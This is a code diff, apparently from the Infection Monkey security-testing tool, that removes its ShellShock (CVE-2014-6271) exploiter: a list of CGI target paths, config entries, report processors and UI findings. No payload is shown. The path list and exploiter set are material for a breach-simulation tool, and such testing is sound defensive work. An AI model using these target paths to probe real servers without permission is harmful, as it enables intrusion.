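-r"/site_searcher.cgi",
-r"/siteUserMod.cgi",
-r"/submit.cgi",
-r"/technote/print.cgi",
-r"/template.cgi",
-r"/test.cgi",
-r"/ucsm/isSamInstalled.cgi",
-r"/upload.cgi",
-r"/userreg.cgi",
-r"/users/scripts/submit.cgi",
-r"/vood/cgi-bin/vood_view.cgi",
-r"/Web_Store/web_store.cgi",
-r"/webtools/bonsai/ccvsblame.cgi",
-r"/webtools/bonsai/cvsblame.cgi",
-r"/webtools/bonsai/cvslog.cgi",
-r"/webtools/bonsai/cvsquery.cgi",
-r"/webtools/bonsai/cvsqueryform.cgi",
-r"/webtools/bonsai/showcheckins.cgi",
-r"/wwwadmin.cgi",
-r"/wwwboard.cgi",
-r"/wwwboard/wwwboard.cgi",
-)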


@ -18,7 +18,6 @@ BASIC = {
"WmiExploiter",
"SSHExploiter",
"Log4ShellExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",


@ -53,16 +53,6 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/sshexec/",
},
{
"type": "string",
"enum": ["ShellShockExploiter"],
"title": "ShellShock Exploiter",
"safe": True,
"info": "CVE-2014-6271, based on logic from "
"https://github.com/nccgroup/shocker/blob/master/shocker.py .",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
"/shellshock/",
},
{
"type": "string",
"enum": ["ElasticGroovyExploiter"],


@ -68,7 +68,6 @@ class AWSExporter(Exporter):
CredentialType.PASSWORD.value: AWSExporter._handle_ssh_issue,
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
},
ExploiterDescriptorEnum.SHELLSHOCK.value.class_name: AWSExporter._handle_shellshock_issue, # noqa:E501
"tunnel": AWSExporter._handle_tunnel_issue,
ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
ExploiterDescriptorEnum.SMB.value.class_name: {
@ -295,23 +294,6 @@ class AWSExporter(Exporter):
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shellshock_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
severity=10,
title="Machines are vulnerable to 'Shellshock'",
description="Update your Bash to a ShellShock-patched version.",
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
"The attack was made possible because the HTTP server running on "
"TCP port {2} was vulnerable to a "
"shell injection attack on the paths: {3}.".format(
issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
),
instance_arn=instance_arn,
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_password_issue(issue, instance_arn):


@ -11,9 +11,6 @@ from monkey_island.cc.services.reporting.issue_processing.exploit_processing.pro
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.log4shell import ( # noqa: E501
Log4ShellProcessor,
)
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( # noqa: E501
ShellShockExploitProcessor,
)
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( # noqa: E501
ZerologonExploitProcessor,
)
@ -34,9 +31,6 @@ class ExploiterDescriptorEnum(Enum):
ELASTIC = ExploiterDescriptor(
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
SHELLSHOCK = ExploiterDescriptor(
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
WEBLOGIC = ExploiterDescriptor(
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor


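--- a/[path not shown on page]
+++ /dev/null
@@ -1,15 +0,0 @@
-from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( # noqa: E501
-ExploiterReportInfo,
-ExploitProcessor,
-)
-class ShellShockExploitProcessor:
-@staticmethod
-def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo:
-exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict)
-urls = exploit_dict["data"]["info"]["vulnerable_urls"]
-exploit_info.port = urls[0].split(":")[2].split("/")[0]
-exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls]
-return exploit_info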


@ -28,7 +28,6 @@ import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIs
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
import {
crossSegmentIssueOverview,
@ -125,11 +124,6 @@ class ReportPageComponent extends AuthComponent {
[this.issueContentTypes.REPORT]: elasticIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'ShellShockExploiter': {
[this.issueContentTypes.OVERVIEW]: shellShockIssueOverview,
[this.issueContentTypes.REPORT]: shellShockIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'PowerShellExploiter': {
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
[this.issueContentTypes.REPORT]: powershellIssueReport,


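--- a/[path not shown on page]
+++ /dev/null
@@ -1,30 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-export function shellShockIssueOverview() {
-return (<li>Machines are vulnerable to Shellshock (<a
-href="https://www.cvedetails.com/cve/CVE-2014-6271">CVE-2014-6271</a>).
-</li>)
-}
-function getShellshockPathListBadges(paths) {
-return paths.map(path => <span className="badge badge-warning" style={{margin: '2px'}} key={path}>{path}</span>);
-}
-export function shellShockIssueReport(issue) {
-return (
-<>
-Update your Bash to a ShellShock-patched version.
-<CollapsibleWellComponent>
-The machine <span className="badge badge-primary">{issue.machine}</span> (<span
-className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
-className="badge badge-danger">ShellShock</span> attack.
-<br/>
-The attack was made possible because the HTTP server running on TCP port <span
-className="badge badge-info">{issue.port}</span> was vulnerable to a shell injection attack on the
-paths: {getShellshockPathListBadges(issue.paths)}.
-</CollapsibleWellComponent>
-</>
-);
-}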


@ -52,7 +52,6 @@
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"ZerologonExploiter",


@ -5,7 +5,6 @@
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",


@ -187,7 +187,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
{"name": "DrupalExploiter", "options": {}},
{"name": "ElasticGroovyExploiter", "options": {}},
{"name": "HadoopExploiter", "options": {}},
{"name": "ShellShockExploiter", "options": {}},
{"name": "Struts2Exploiter", "options": {}},
{"name": "WebLogicExploiter", "options": {}},
{"name": "ZerologonExploiter", "options": {}},


@ -57,7 +57,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)